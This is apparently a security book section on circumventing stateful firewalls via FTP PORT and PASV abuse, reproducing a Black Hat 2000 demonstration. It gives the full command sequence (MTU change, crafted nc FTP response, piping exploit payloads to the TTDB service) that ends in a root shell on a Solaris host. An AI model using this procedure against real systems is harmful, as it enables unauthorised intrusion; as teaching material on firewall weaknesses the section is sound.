8.5 Circumventing Stateful Filters Using FTP

At Black Hat Briefings 2000 in Las Vegas, Thomas Lopatic, John McDonald, and Dug Song presented "A Stateful Inspection of Firewall-1" (available as a Real Media video stream and Powerpoint presentation from http://www.blackhat.com/html/bh-usa-00/bh-usa-00-speakers.html), which documented a raft of security issues with Checkpoint Firewall-1 4.0 SP4. One area covered was abusing FTP access to a host through a stateful firewall in order to open ports and gain access to services that should otherwise be filtered.

By its very specification, FTP is a complex protocol used to transfer files that have two channels: the control channel (using TCP port 21) and the data channel (using TCP port 20). The PORT and PASV commands are issued across the control channel to determine which dynamic high ports (above 1024) are used to transfer and receive data.

8.5.1 PORT and PASV

The PORT command defines a dynamic high port from which the client system receives data. Most firewalls perform stateful inspection of FTP sessions, so the PORT command populates the state table.

Figure 8-3 shows a client system that connects to an FTP server through a firewall and issues a PORT command to receive data. A short explanation of the command follows.

Figure 8-3. The PORT command populates the firewall state table

The reason that port 1039 is opened is because the last two digits in the PORT command argument (4 and 15) are first converted to hexadecimal:

• 4 becomes 0x04

• 15 becomes 0x0F

The two values then concatenate to become 0x040F, and a tool such as the Base Converter application found in Hex Workshop (available from http://www.bpsoft.com) is used to find the decimal value, as shown in Figure 8-4.

Figure 8-4. Converting the concatenated hex value to a port number

Most modern commercial firewalls (with the exception of earlier Cisco PIX releases) enforce that FTP holes punched through the firewall must be to ports above 1024. For example, if an attacker could send a crafted outbound PORT command as part of an established FTP session from the protected server (i.e., the FTP server in Figure 8-2), he could access services running on high ports, such as RPC services.

8.5.2 PASV Abuse

Lopatic, McDonald, and Song built on the PORT abuse approach and came up with an attack involving abuse of the PASV command. This attack fools stateful firewalls (Check Point Firewall-1, Cisco PIX, etc.) into opening high ports on a protected FTP server, in turn allowing for direct exploitation through a crafted exploit payload being delivered through the firewall to the open high port.

By advertising a small maximum transmission unit (MTU) value, an attacker can abuse the PASV command and open ports on the target FTP server through a stateful firewall such as Check Point Firewall-1 or Cisco PIX.

In the following example (demonstrated at Blackhat 2000), John McDonald compromised an unpatched Solaris 2.6 server behind a Check Point Firewall-1 appliance filtering access to all ports except for FTP (TCP port 21).

McDonald crafted two exploit payloads to overflow the TTDB service running on TCP port 32775 of the target host, named killfile and hackfile. For the exploit to be effective, the TTDB service must be forcefully restarted using the killfile, then the hackfile replaces the /usr/sbin/in.ftpd binary with /bin/sh. The following is a demonstration of this process.

First, set the MTU for the network card of the Linux launch system to 100:

# /sbin/ifconfig eth0 mtu 100

Next, connect to the target FTP server (172.16.0.2) on port 21 using nc and issue a long string of characters followed by a crafted FTP server response:

# nc -vvv 172.16.0.2 21 172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 21 (?) open 220 sol FTP server (SunOS 5.6) ready. XXXXXXXXXXXXXXXXXXXXX227 (172,16,0,2,128,7) 500 Invalid command given: XXXXXXXXXXXXXXXXXXXXX [1]+ Stopped nc -vvv 172.16.0.2 21

The effect of setting the low MTU is detailed in Figure 8-5, resulting in the 227 (172,16,0,2,128,7) server response being processed by the firewall, and added to the state table. You can now send data to TCP port 32775 on 172.16.0.2.

Figure 8-5. The FTP error response is broken by the low MTU

Now that the port is open, use nc to push the killfile binary data to port 32775 and restart the TTDB service:

# cat killfile | nc -vv 172.16.0.2 32775 172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 32775 (?) open sent 80, rcvd 0

Then repeat the process to re-open the port on the target server:

# nc -vvv 172.16.0.2 21 172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 21 (?) open 220 sol FTP server (SunOS 5.6) ready. XXXXXXXXXXXXXXXXXXXXX227 (172,16,0,2,128,7) 500 Invalid command given: XXXXXXXXXXXXXXXXXXXXX [2]+ Stopped nc -vvv 172.16.0.2 21

And then push the hackfile binary data, exploiting the TTDB service fully:

# cat hackfile | nc -vv 172.16.0.2 32775 172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 32775 (?) open sent 1168, rcvd 0

If the buffer overflow has been successful, the FTP server binary is replaced with /bin/sh, giving command-line root access to the host:

# nc -vvv 172.16.0.2 21 172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 21 (?) open  id uid=0(root) gid=0(root)

The nc client (also known as netcat) is available from the following locations:

http://netcat.sourceforge.net/

http://www.atstake.com/research/tools/